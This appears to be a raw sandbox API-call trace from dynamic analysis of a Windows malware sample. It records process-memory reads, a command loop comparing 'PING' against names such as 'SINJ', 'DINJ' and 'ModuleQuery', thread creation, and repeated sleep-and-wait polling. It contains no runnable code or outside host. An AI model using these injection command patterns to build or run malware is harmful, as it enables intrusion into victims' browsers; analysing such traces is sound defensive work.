	[0239.283] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.283] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.283] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bff18) returned 1
	[0239.283] Sleep (dwMilliseconds=0xbb8) 
	[0239.289] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bff18
	[0239.289] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0239.289] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225f40
	[0239.289] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x26d4600
	[0239.289] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225e30
	[0239.289] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0239.289] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225f40, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225f40*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0239.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225f40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0239.289] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7a28
	[0239.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225f40, cbMultiByte=-1, lpWideCharStr=0x22b7a28, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0239.289] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x26d4600, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26d4600, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0239.289] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225e30, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225e30*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0239.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0239.290] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27beff0
	[0239.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x27beff0, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0239.290] SetEvent (hEvent=0x474) returned 1
	[0239.290] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225f40) returned 1
	[0239.290] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26d4600) returned 1
	[0239.290] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225e30) returned 1
	[0239.290] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfdd8
	[0239.290] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0239.290] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0239.290] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0239.290] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0239.290] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0239.290] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7a70
	[0239.290] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27bff18, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0x604) returned 0x6fc
	[0239.290] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf2e8
	[0239.290] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.290] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.290] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.290] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.290] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf2e8) returned 1
	[0239.290] Sleep (dwMilliseconds=0xbb8) 
	[0239.347] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf2e8
	[0239.347] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.347] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.347] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.347] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.347] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.347] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf2e8) returned 1
	[0239.347] Sleep (dwMilliseconds=0xbb8) 
	[0239.352] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf2e8
	[0239.352] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.352] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.352] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.352] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.352] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.352] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf2e8) returned 1
	[0239.352] Sleep (dwMilliseconds=0xbb8) 
	[0239.368] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf2e8
	[0239.368] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.368] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.368] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.368] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.368] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.368] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf2e8) returned 1
	[0239.368] Sleep (dwMilliseconds=0xbb8) 
	[0239.383] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf9f0
	[0239.383] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.383] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.383] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.383] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.383] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.383] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9f0) returned 1
	[0239.383] Sleep (dwMilliseconds=0xbb8) 
	[0239.398] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf9f0
	[0239.398] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.408] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.409] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.409] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.409] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.409] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9f0) returned 1
	[0239.409] Sleep (dwMilliseconds=0xbb8) 
	[0239.414] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf9f0
	[0239.414] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.414] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.414] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.414] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.414] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.414] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9f0) returned 1
	[0239.414] Sleep (dwMilliseconds=0xbb8) 
	[0239.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf9f0
	[0239.436] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.436] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.436] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.436] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.436] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.436] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9f0) returned 1
	[0239.436] Sleep (dwMilliseconds=0xbb8) 
	[0239.445] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf9f0
	[0239.445] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.445] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.445] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.445] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.445] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.445] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9f0) returned 1
	[0239.445] Sleep (dwMilliseconds=0xbb8) 
	[0239.461] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf9f0
	[0239.461] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.461] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.461] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.461] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.461] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.461] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9f0) returned 1
	[0239.461] Sleep (dwMilliseconds=0xbb8) 
	[0239.476] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf9f0
	[0239.476] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.476] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.477] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.477] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.477] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.477] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9f0) returned 1
	[0239.477] Sleep (dwMilliseconds=0xbb8) 
	[0239.492] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf9f0
	[0239.492] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.492] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.492] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.492] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.492] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.492] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9f0) returned 1
	[0239.492] Sleep (dwMilliseconds=0xbb8) 
	[0239.510] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf9f0
	[0239.510] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.510] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.510] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.510] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.510] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.510] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9f0) returned 1
	[0239.510] Sleep (dwMilliseconds=0xbb8) 
	[0239.523] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf9f0
	[0239.523] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.523] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.524] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.524] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.524] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.524] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9f0) returned 1
	[0239.524] Sleep (dwMilliseconds=0xbb8) 
	[0239.539] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf9f0
	[0239.539] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.539] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.539] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.539] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.539] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.539] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9f0) returned 1
	[0239.539] Sleep (dwMilliseconds=0xbb8) 
	[0239.587] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bef28
	[0239.587] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.587] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.587] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.587] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.587] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.587] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bef28) returned 1
	[0239.587] Sleep (dwMilliseconds=0xbb8) 
	[0239.679] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1098
	[0239.679] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.679] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.679] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.679] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.679] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.679] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c1098) returned 1
	[0239.680] Sleep (dwMilliseconds=0xbb8) 
	[0239.773] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1cf0
	[0239.773] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0239.773] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.773] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.773] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.773] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.773] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c1cf0) returned 1
	[0239.773] Sleep (dwMilliseconds=0xbb8) 
	[0239.861] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0239.861] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225e30, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225e30*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0239.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0239.861] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x24d328
	[0239.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225e30, cbMultiByte=-1, lpWideCharStr=0x24d328, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0239.861] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x26b8780, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26b8780, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0239.861] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x2255b0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2255b0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0239.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0239.861] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2600
	[0239.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x27c2600, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0239.861] SetEvent (hEvent=0x474) returned 1
	[0239.861] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225e30) returned 1
	[0239.861] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0239.861] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2255b0) returned 1
	[0239.861] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2628
	[0239.861] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0239.862] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0239.862] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0239.862] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0239.862] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0239.862] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x24d0d0
	[0239.862] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27c25d8, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0x680) returned 0x67c
	[0239.862] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2650
	[0239.862] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0239.862] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0239.862] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0239.862] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0239.862] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2650) returned 1
	[0242.875] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0242.875] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2251f8
	[0242.875] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x26b8780
	[0242.875] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225eb8
	[0242.875] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0242.875] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x2251f8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2251f8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0242.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2251f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0242.875] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fff48
	[0242.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2251f8, cbMultiByte=-1, lpWideCharStr=0x22fff48, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0242.875] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x26b8780, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26b8780, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0242.875] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225eb8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225eb8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0242.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225eb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0242.875] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0918
	[0242.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225eb8, cbMultiByte=-1, lpWideCharStr=0x27c0918, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0242.875] SetEvent (hEvent=0x474) returned 1
	[0242.876] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2251f8) returned 1
	[0242.876] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0242.876] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225eb8) returned 1
	[0242.876] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c08f0
	[0242.876] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0242.876] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0242.876] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0242.876] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0242.876] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0242.876] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffbb8
	[0242.876] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27c0580, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xb0) returned 0x6f8
	[0242.876] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0940
	[0242.876] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0242.876] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0242.876] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0242.876] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0242.876] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0242.876] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0940) returned 1
	[0242.876] Sleep (dwMilliseconds=0xbb8) 
	[0242.877] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0242.877] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0242.877] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0242.878] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0242.878] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0242.878] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0242.878] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0940) returned 1
	[0242.878] Sleep (dwMilliseconds=0xbb8) 
	[0242.893] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0242.893] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0242.893] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0242.893] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0242.893] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0242.893] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0242.893] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0242.893] Sleep (dwMilliseconds=0xbb8) 
	[0242.908] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0242.909] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0242.909] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0242.909] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0242.909] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0242.909] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0242.909] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0242.909] Sleep (dwMilliseconds=0xbb8) 
	[0242.925] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0242.925] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0242.925] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0242.925] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0242.925] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0242.925] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0242.925] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0242.925] Sleep (dwMilliseconds=0xbb8) 
	[0242.940] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0242.940] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
